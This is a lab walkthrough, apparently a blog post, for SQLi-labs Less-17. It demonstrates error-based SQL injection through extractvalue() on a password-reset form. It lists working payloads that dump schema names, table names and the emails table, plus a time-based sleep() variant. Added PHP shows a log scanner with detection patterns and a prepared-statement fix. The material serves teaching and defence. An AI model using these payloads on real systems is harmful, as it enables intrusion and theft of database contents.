SQLi-labs Less-17: error-based injection with the extractvalue() function

This level is a password-reset form, so the back end runs an UPDATE statement rather than a SELECT. Injecting into an UPDATE works the same way: close the original quote and then construct the rest of the payload.

Triggering an error

Username: admin

Password: 1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin'' at line 1

The fragment admin'' in the message shows that the password value is enclosed in single quotes.

Next, we use error-based injection.

First, a short introduction to error-based injection with the extractvalue() function.

extractvalue(): a function that queries an XML document.

Syntax: extractvalue(xml_document, xpath_expression)

The second argument is the XPath location to read, which must have the form /xxx/xxx/xxx/... If we pass a string in a different format, MySQL raises an error and echoes the illegal content back in the error message, and that illegal content is where we place the result of the query we want to read.

If the second argument is a well-formed path such as /xxx/xx/xx/xx, no error is raised even when the path matches nothing:

select username from security.users where id=1 and (extractvalue('anything','/x/xx'));

Using concat() to prepend '/' has the same effect; the following statement looks up the path /<result of database()> in the document 'anything':

select username from security.users where id=1 and (extractvalue('anything',concat('/',(select database()))));

Here the path is still syntactically valid, so no error is raised. Now we deliberately make the path invalid:

select username from security.users where id=1 and (extractvalue('anything',concat('~',(select database()))));

As can be seen, the path now begins with ~, which is not valid XPath syntax, so MySQL reports an XPATH syntax error and echoes the unrecognized content, which is exactly the query result we wanted.

One thing to note: the string shown in the extractvalue() error message has a maximum length of 32 characters, so if the result is longer than 32 characters we need substring() to cut it into pieces and read it 32 characters at a time.

As an illustration, here we read only the first 5 characters:

select username from security.users where id=1 and (extractvalue('anything',concat('~',substring((select database()),1,5))));

Now that we understand the principle, let's try it on the lab.

First, obtain the value of database():

uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))#&submit=Submit

Here 0x7e is the hex ASCII code of ~, and it appears as ~ in the decoded result.

Then we can use SELECT statements to retrieve database names, table names and column names, with the same queries used in union-based injection. Because error-based injection displays only one result at a time, we must either use LIMIT so the subquery returns a single row, or use group_concat() to print all results on a single line.

 

Obtain the names of the other databases

uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e)) #&submit=Submit

You can also use group_concat(schema_name) to list all database names at once:

uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e)) #&submit=Submit

As shown above, only the first 32 characters are displayed, so we use substring() to read the rest of the data past the first 32 characters:

uname=admin&passwd=1' and extractvalue(1,concat(0x7e,substring((select group_concat(schema_name) from information_schema.schemata),30,32),0x7e)) #&submit=Submit

 

Get the table names of the current database

uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) #&submit=Submit

 

Get the column names of the users table

uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e)) #&submit=Submit

 

Read the contents of the users table

uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3e,password) from users),0x7e)) #&submit=Submit

As shown above, this produces the error: You can not specify target table 'users' for update in FROM clause, because the subquery reads from the same table that the UPDATE statement is modifying.

But we can use the same method to dump other tables, such as emails:

uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select group_concat(id,0x3a,email_id) from emails),0x7e)) #&submit=Submit

 

Of course, time-based injection also works here, and the delay is clearly observable:

uname=admin&passwd=11' and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&submit=Submit

Other methods are not demonstrated here; think about them yourself!
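From the defender's side, the payloads above leave a distinctive trail: extractvalue( or updatexml( calls, the 0x7e/~ delimiter inside concat(), information_schema lookups, and sleep() for the time-based variant. The following PHP scanner is an added example, not part of the lab or the original post; it runs those signatures over constructed access-log lines and assumes the payload was logged in the request line.

```php
<?php
// Added example, not part of the lab: scan access-log lines for the signatures
// of the error-based and time-based payloads shown above. The log lines are
// constructed; this assumes the payload appears in the logged request line.

// Patterns worth alerting on, applied to the URL-decoded request.
const SQLI_PATTERNS = [
    'extractvalue_call' => '/\bextractvalue\s*\(/i',
    'updatexml_call'    => '/\bupdatexml\s*\(/i',
    'concat_marker'     => '/concat\s*\(\s*(0x7e|\'~\')/i',   // the 0x7e / ~ delimiter
    'schema_probe'      => '/information_schema\.(schemata|tables|columns)/i',
    'time_based'        => '/\bsleep\s*\(\s*\d+\s*\)/i',
];

// Return the names of all patterns that match one request string.
function classify_request(string $request): array
{
    $decoded = urldecode($request);
    $hits = [];
    foreach (SQLI_PATTERNS as $name => $re) {
        if (preg_match($re, $decoded)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Parse one combined-log-format line into client and request path, or null.
function parse_log_line(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/', $line, $m)) {
        return null;
    }
    return ['client' => $m[1], 'request' => $m[2]];
}

// Constructed sample lines: one benign request and two matching the payloads above.
$sample_log = <<<'LOG'
10.0.0.5 - - [10/Apr/2020:12:00:01 +0000] "GET /Less-17/index.php HTTP/1.1" 200 1340
10.0.0.9 - - [10/Apr/2020:12:00:07 +0000] "GET /Less-17/?uname=admin&passwd=1%27%20and%20extractvalue(1,concat(0x7e,(select%20database()),0x7e))%23 HTTP/1.1" 200 1566
10.0.0.9 - - [10/Apr/2020:12:00:19 +0000] "GET /Less-17/?uname=admin&passwd=11%27%20and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))%23 HTTP/1.1" 200 1340
LOG;

foreach (explode("\n", $sample_log) as $line) {
    $entry = parse_log_line($line);
    $hits  = $entry ? classify_request($entry['request']) : [];
    if ($hits) {
        printf("ALERT %s %s: %s\n", $entry['client'], $entry['request'], implode(', ', $hits));
    }
}
```

The first sample line is benign and produces no alert; the second flags extractvalue_call and concat_marker, the third flags time_based.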

 

Question: looking at the source code, there is also a SELECT statement. Why don't we inject through the username instead?

In fact, the source code contains a function, check_input(), which is applied to the username.

function check_input($value)
{
    // Truncate the input to 15 characters (see comments)
    if (!empty($value)) {
        $value = substr($value, 0, 15);
    }

    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc()) {
        $value = stripslashes($value);
    }

    // Quote if not a number; otherwise cast to an integer.
    // In the lab's original indentation the else looks detached,
    // but it belongs to this ctype_digit() check.
    if (!ctype_digit($value)) {
        $value = "'" . mysql_real_escape_string($value) . "'";
    } else {
        $value = intval($value);
    }
    return $value;
}

A brief introduction to a few of these functions makes this clear.

★addslashes()

The addslashes() function returns a string with a backslash added before each predefined character.

The predefined characters are:

  • single quote (')
  • double quote (")
  • backslash (\)
  • NULL

Tip: This function can be used to prepare a string for storage in a database or for use in a database query.

Note: By default, PHP automatically runs addslashes() on all GET, POST and COOKIE data, so you should not apply addslashes() to a string that has already been escaped, because this would double-escape it. Use get_magic_quotes_gpc() to detect whether this is happening.

Syntax: addslashes(string)

Parameter: string (required). The string to be escaped.

Return value: the escaped string.

PHP version: 4+

 

★stripslashes()

Removes the backslashes added by addslashes().

 

★mysql_real_escape_string()

Escapes the special characters in a string for use in an SQL statement.

The following characters are affected:

  • \x00
  • \n
  • \r
  • \
  • '
  • "
  • \x1a

On success the function returns the escaped string; on failure it returns false.

Syntax: mysql_real_escape_string(string, connection)

Parameter: string (required). The string to be escaped.

Parameter: connection (optional). The MySQL connection to use. If not specified, the most recently opened connection is used.

Description: This function escapes the special characters in the string, taking the current character set of the connection into account, so that the result can be safely passed to mysql_query().

 

In Less-17, check_input() applies all of this escaping and quoting to the username, so the username cannot be used for injection; only the password, which is not passed through check_input(), is injectable.
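The proper fix is not to escape and quote harder but to keep user data out of the SQL parser altogether. The following PHP is an added example, not the lab's code: a hardened Less-17 handler using mysqli prepared statements. It assumes the UPDATE users SET password ... WHERE username ... form of the lab's query, a password column wide enough to hold a hash, and placeholder connection credentials.

```php
<?php
// Added example, not the lab's own code. Both the username lookup and the
// password UPDATE bind their values as parameters, so a quote or an
// extractvalue(...) fragment in $passwd is stored as data and never parsed
// as SQL. The UPDATE form and the hash-sized password column are assumptions.

// Throw on SQL errors instead of letting their text reach the response:
// error-based injection depends on MySQL messages being echoed to the page.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

function reset_password(mysqli $db, string $uname, string $passwd): bool
{
    // Look up the user with a bound parameter; no quoting or escaping needed.
    $sel = $db->prepare('SELECT username FROM users WHERE username = ? LIMIT 1');
    $sel->bind_param('s', $uname);
    $sel->execute();
    $row = $sel->get_result()->fetch_assoc();
    $sel->close();
    if ($row === null) {
        return false;               // unknown user: nothing to update
    }

    // Store a password hash rather than the plaintext the lab keeps.
    $hash = password_hash($passwd, PASSWORD_DEFAULT);
    $upd = $db->prepare('UPDATE users SET password = ? WHERE username = ?');
    $upd->bind_param('ss', $hash, $uname);
    $upd->execute();
    $changed = ($upd->affected_rows === 1);
    $upd->close();
    return $changed;
}

try {
    // Placeholder credentials; the lab's database is named "security".
    $db = new mysqli('localhost', 'DB_USER_PLACEHOLDER', 'DB_PASS_PLACEHOLDER', 'security');
    $ok = reset_password($db, $_POST['uname'] ?? '', $_POST['passwd'] ?? '');
    echo $ok ? 'Password updated.' : 'Password update failed.';
} catch (mysqli_sql_exception $e) {
    error_log('Less-17 reset failed: ' . $e->getMessage()); // log, never echo
    echo 'Password update failed.';
}
```

With the error text logged rather than echoed, the extractvalue() payloads above have no channel to return data even if a query did fail.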

 



Origin: www.cnblogs.com/zhengna/p/12619666.html